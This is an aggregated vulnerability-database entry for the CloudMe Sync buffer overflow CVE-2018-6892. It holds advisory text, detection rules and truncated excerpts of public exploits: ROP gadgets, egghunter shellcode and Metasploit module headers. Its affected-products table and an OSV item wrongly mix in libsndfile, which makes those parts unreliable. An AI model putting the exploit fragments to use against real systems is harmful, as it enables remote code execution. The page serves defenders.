CVE-2018-6892
Published: 2018-02-11
Priority: P1 84 · critical · CVSS 3.0 base score 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
Exploit: public exploit available
EPSS: 93.60% (99.8th percentile)
An issue was discovered in CloudMe before 1.11.0. An unauthenticated remote attacker that can connect to the "CloudMe Sync" client application listening on port 8888 can send a malicious payload causing a buffer overflow condition. This will result in an attacker controlling the program's execution flow and allowing arbitrary code execution.
Affected (4 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| cloudme | sync | <= 1.10.9 | — |
| cloudme | sync | — | — |
| libsndfile_project | libsndfile | >= 0 < 1.0.25-10ubuntu0.16.04.3 | 1.0.25-10ubuntu0.16.04.3 |
| libsndfile_project | libsndfile | >= 0 < 1.0.25-7ubuntu2.2+esm1 | 1.0.25-7ubuntu2.2+esm1 |
Detection & IOCs (extracted from sources)
- Monitor for TCP connections to port 8888 (CloudMe Sync listener); unauthenticated inbound connections from unexpected hosts should be alerted on.
- Detect oversized payloads (>1052–2232 bytes) sent to TCP/8888 as a network-level indicator of buffer overflow exploitation attempts against CloudMe Sync.
- Detect the egghunter tag 'boomboom' (\x62\x6f\x6f\x6d\x62\x6f\x6f\x6d) or 'w00tw00t' in network traffic to TCP/8888.
- Look for the CloudMe Sync process (CloudMe.exe) listening on 0.0.0.0:8888, which exposes it to unauthenticated remote attackers on all interfaces.
- CloudMe DLLs (Qt5Core.dll, Qt5Gui.dll, libstdc++-6.dll, icuin49.dll, icuuc49.dll, Qt5Network.dll, Qt5Sql.dll, libgcc_s_dw2-1.dll, LIBEAY32.dll, libwinpthread-1.dll, libGLESv2.dll) loaded without ASLR/SafeSEH are abused for ROP chains; verify these modules are not loaded with ASLR disabled.
- The exploit targets CloudMe Sync versions 1.8.x, 1.9.x, 1.10.9, and 1.11.2; versions before 1.11.0 are confirmed vulnerable per the NVD advisory. ROP gadget addresses are version- and DLL-specific and will differ across installations.
- The DEP-bypass ROP chain for v1.8.x/v1.9.x uses hardcoded gadget addresses from icuin49.dll, Qt5Core.dll, Qt5Gui.dll, libGLESv2.dll, LIBEAY32.dll, libwinpthread-1.dll, and icuuc49.dll; these addresses are only valid for those specific DLL versions.
- The v1.10.9 exploit relies on ASLR and SafeSEH being disabled for CloudMe modules; the SEH overwrite at offset 2232 using 0x61e7b7f6 (Qt5Gui.dll) is only reliable when ASLR is off.
- The WoW64 DEP-bypass exploit (46250) targets CloudMe 1.11.2 on Windows 7 SP1 x64 and uses a different EIP offset (1052) and gadget set compared to the x86 variants.
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| NVD | 3.0 | 9.8 | CRITICAL | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| NVD | 2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P |
| OSV | — | 9.8 | CRITICAL | — |
GHSA
GHSA-whgv-r48w-wxh3 (CVE-2018-7886, CRITICAL, CWE-119) · ghsa_unreviewed · 2022-05-14 · CVSS 9.8
An issue was discovered in CloudMe 1.11.0. An unauthenticated local attacker that can connect to the "CloudMe Sync" client application listening on 127.0.0.1 port 8888 can send a malicious payload causing a buffer overflow condition. This will result in code execution, as demonstrated by a TCP reverse shell, or a crash. NOTE: this vulnerability exists because of an incomplete fix for CVE-2018-6892.
GHSA
GHSA-8phr-7v4m-7r33 (CVE-2018-6892, CRITICAL, CWE-119) · ghsa_unreviewed · 2022-05-13
An issue was discovered in CloudMe before 1.11.0. An unauthenticated remote attacker that can connect to the "CloudMe Sync" client application listening on port 8888 can send a malicious payload causing a buffer overflow condition. This will result in an attacker controlling the program's execution flow and allowing arbitrary code execution.
OSV
libsndfile vulnerabilities (CVE-2017-12562) · osv · 2021-01-26 · CVSS 9.8
It was discovered that libsndfile incorrectly handled certain malformed files. A remote attacker could use this issue to cause libsndfile to crash, resulting in a denial of service, or possibly execute arbitrary code. (CVE-2017-12562)
It was discovered that libsndfile incorrectly handled certain malformed files. A remote attacker could use this issue to cause libsndfile to crash, resulting in a denial of service, or possibly execute arbitrary code. This issue only affected Ubuntu 14.04 ESM. (CVE-2017-14245, CVE-2017-14246, CVE-2017-14634, CVE-2017-16942, CVE-2017-6892, CVE-2018-13139, CVE-2018-19432, CVE-2018-19661, CVE-2018-19662, CVE-2018-19758, CVE-2019-3832)
Suricata
ET EXPLOIT Possible CloudMe Sync Stack-based Buffer Overflow Inbound (CVE-2018-6892) [CRITICAL] · suricata · 2021-07-27 · CVSS 9.8
Rule: alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] 8888 (msg:"ET EXPLOIT Possible CloudMe Sync Stack-based Buffer Overflow Inbound (CVE-2018-6892)"; flow:established,to_server; content:"|90 90 90 90 90 90 90 90|"; offset:500; depth:800; content:"|90 90 90 90 90 90|"; within:64; reference:url,www.exploit-db.com/exploits/44175; reference:cve,2018-6892; classtype:attempted-admin; sid:2033448; rev:2; metadata:attack_target Server, created_at 2021_07_27, cve CVE_2018_6892, deployment Perimeter, deployment Internal, confidence Medium, signature_severity Major, tag Exploit, updated_at 2024_03_08, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Pu
Suricata
ET EXPLOIT CloudMe Sync Buffer Overflow (CVE-2018-6892) · suricata · 2018-06-29
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 8888 (msg:"ET EXPLOIT CloudMe Sync Buffer Overflow"; flow:established,to_server; content:"|fe e7 d1 61 a8 98 03 69 10 06 e7 6f 6f 0a c4 61 5a ea c8 68 e1 52 d6 68 a2 7c fa 68 ff fd ff ff|"; fast_pattern; distance:0; content:"|92 70 b4 6e 47 27 d5 68 ff ff ff ff bc 48 f9 68|"; distance:0; content:"|3c 06 f8 68 72 a4 f9 68 c0 ff ff ff 92 70 b4 6e|"; distance:0; content:"|ab 57 f0 61 a3 ef b5 6e d1 14 dc 61 0c ed b4 64 45 62 ba 61|"; distance:0; content:"|90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90|"; distance:0; reference:url,exploit-db.com/exploits/44784/; reference:cve,2018-6892; classtype:attempted-admin; sid:2025766; rev:2; metadata:attack_target Server, created_at 2018_06_29, cve CVE_
Exploit-DB
CloudMe 1.11.2 - Buffer Overflow ROP (DEP_ASLR) (CVE-2018-6892, CRITICAL) · exploitdb · 2020-09-29 · CVSS 9.8
---
# Exploit Title: CloudMe 1.11.2 - Buffer Overflow ROP (DEP,ASLR)
# Exploit Author: Bobby Cooke (boku)
# CVE: CVE-2018-6892
# Date: 2020-09-29
# Vendor Homepage: https://www.cloudme.com/
# Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe
# Version: 1.11.2
# Tested On: Windows 10 (x64) - 10.0.19041 Build 19041
# Script: Python 2.7
# Notes:
# This exploit uses MSVCRT.System to create a new user (boku:0v3R9000!) and add the new user to the
# Administrators group. A requirement of successful exploitation is that the CloudMe.exe process must be
# running as administrator, such as when run with 'Run as Administrator', as this permission is required
# to create new users on the system. This exploit has been tested against multiple Wi
Exploit-DB
CloudMe Sync 1.11.2 Buffer Overflow - WoW64 (DEP Bypass) (CVE-2018-6892, CRITICAL) · exploitdb · 2019-01-28 · CVSS 9.8
---
# Exploit Title: CloudMe Sync v1.11.2 Buffer Overflow - WoW64 - (DEP Bypass)
# Date: 24.01.2019
# Exploit Author: Matteo Malvica
# Vendor Homepage:https://www.cloudme.com/en
# Software: https://www.cloudme.com/downloads/CloudMe_1112.exe
# Category: Remote
# Contact:https://twitter.com/matteomalvica
# Version: CloudMe Sync 1.11.2
# Tested on: Windows 7 SP1 x64
# CVE-2018-6892
# Ported to WoW64 from https://www.exploit-db.com/exploits/46218
import socket
import struct
def create_rop_chain():
# rop chain generated with mona.py - www.corelan.be
rop_gadgets = [
0x61ba8b5e, # POP EAX # RETN [Qt5Gui.dll]
0x690398a8, # ptr to &VirtualProtect() [IAT Qt5Core.dll]
0x61bdd7f5, # MOV EAX,DWORD PTR DS:[EAX] # RETN [Qt5Gui.dll]
0x68aef542,
Exploit-DB
CloudMe Sync 1.11.2 - Buffer Overflow + Egghunt (CVE-2018-6892, CRITICAL) · exploitdb · 2019-01-22 · CVSS 9.8
---
#######################################################
# Exploit Title: CloudMe Sync v1.11.2 Buffer Overflow + Egghunt
# Date: 23.04.2018
# Exploit Author:T3jv1l
# Vendor Homepage:https://www.cloudme.com/en
# Software: https://www.cloudme.com/downloads/CloudMe_1112.exe
# Category:Local
# Contact:https://twitter.com/T3jv1l
# Version: CloudMe Sync 1.11.2 - Buffer Overflow + Egghunt
# Tested on: Windows 7 SP1 x86
# CVE-2018-6892
# Real exploit https://www.exploit-db.com/exploits/44027 in version 1.11.0
# Hello subinacls and NytroRST !
#############################################################
import socket
egg = (
"\x66\x81\xca\xff\x0f\x42\x52\x6a"
"\x02\x58\xcd\x2e\x3c\x05\x5a\x74" #boom
"\xef\xb8\x62\x6f\x6f\x6d\x8b\xfa"
"\xaf\x75
Exploit-DB
Cloudme 1.9 - Buffer Overflow (DEP) (Metasploit) (CVE-2018-6892, CRITICAL) · exploitdb · 2018-08-14 · CVSS 9.8
---
# Exploit Title: Cloudme 1.9 - Buffer Overflow (DEP) (Metasploit)
# Date: 2018-08-13
# Exploit Author: Raymond Wellnitz
# Vendor Homepage: https://www.cloudme.com
# Version: 1.8.x/1.9.x
# Tested on: Windows 7 x64
# CVE : 2018-6892
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule 'Cloudme v1.8.x/v1.9.x Buffer Overflow with DEP-Bypass',
'Description' => %q{
This module exploits a stack buffer overflow in Cloudme v1.8.x/v1.9.x.
},
'Author' => [ 'Raymond Wellnitz' ],
'References' =>
[
[ 'CVE', 'CVE-2018-6892' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Platform' => 'win',
'Privileged' => true,
'Payload' =>
{
'Space'
Exploit-DB
CloudMe Sync 1.10.9 - Stack-Based Buffer Overflow (Metasploit) (CVE-2018-6892) · exploitdb · 2018-02-26
---
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule 'CloudMe Sync v1.10.9',
'Description' => %q{
This module exploits a stack-based buffer overflow vulnerability
in CloudMe Sync v1.10.9 client application. This module has been
tested successfully on Windows 7 SP1 x86.
},
'License' => MSF_LICENSE,
'Author' =>
[
'hyp3rlinx', # Original exploit author
'Daniel Teixeira' # MSF module author
],
'References' =>
[
[ 'CVE', '2018-6892'],
[ 'EDB', '44027' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread'
},
'Platform' => 'win',
'Payload' =>
{
'BadChars' => "\x00",
},
'Targets' =>
[
[ 'CloudMe Sync v1.10.9',
{
'Offset' => 2
Exploit-DB
CloudMe Sync < 1.11.0 - Buffer Overflow (CVE-2018-6892, CRITICAL) · exploitdb · 2018-02-13 · CVSS 9.8
---
MOV DWORD PTR SS:[ESP+4],22B8
00564DF9 . 890424 MOV DWORD PTR SS:[ESP],EAX
00564DFC . FF15 B8738100 CALL DWORD PTR DS:[; Qt5Netwo._ZN10QTcpServer6listenERK12QHostAddresst
C:\>netstat -ano | findstr 8888
TCP 0.0.0.0:8888 0.0.0.0:0 LISTENING 15504
TCP [::]:8888 [::]:0 LISTENING 15504
Buffer Overflow:
EIP register will be overwritten at about 1075 bytes.
EAX 00000001
ECX 76F698DA msvcrt.76F698DA
EDX 00350000
EBX 41414141
ESP 0028D470
EBP 41414141
ESI 41414141
EDI 41414141
EIP 41414141
Stack Dump:
(508.524): Access violation - code c0000005 (first/second chance not available)
*** ERROR: Symbol file could not be found. Defaulted to export symbols for ntdll.dll -
eax=00000000 ebx=00000000 ecx=41414141 edx=778f353d esi=00000000 edi=00000000
eip=41414141 esp=00091474 ebp=000914
Metasploit
CloudMe Sync v1.10.9 · metasploit
This module exploits a stack-based buffer overflow vulnerability in CloudMe Sync v1.10.9 client application. This module has been tested successfully on Windows 7 SP1 x86.
No writeups or analysis indexed.
References
- http://hyp3rlinx.altervista.org/advisories/CLOUDME-SYNC-UNAUTHENTICATED-REMOTE-BUFFER-OVERFLOW.txt
- http://packetstormsecurity.com/files/157407/CloudMe-1.11.2-Buffer-Overflow.html
- http://packetstormsecurity.com/files/158716/CloudMe-1.11.2-SEH-Buffer-Overflow.html
- http://packetstormsecurity.com/files/159327/CloudMe-1.11.2-Buffer-Overflow.html
- https://blogs.securiteam.com/index.php/archives/3669
- https://www.exploit-db.com/exploits/44027/
- https://www.exploit-db.com/exploits/44175/
- https://www.exploit-db.com/exploits/45197/
- https://www.exploit-db.com/exploits/46250/
- https://www.exploit-db.com/exploits/48840
Published: 2018-02-11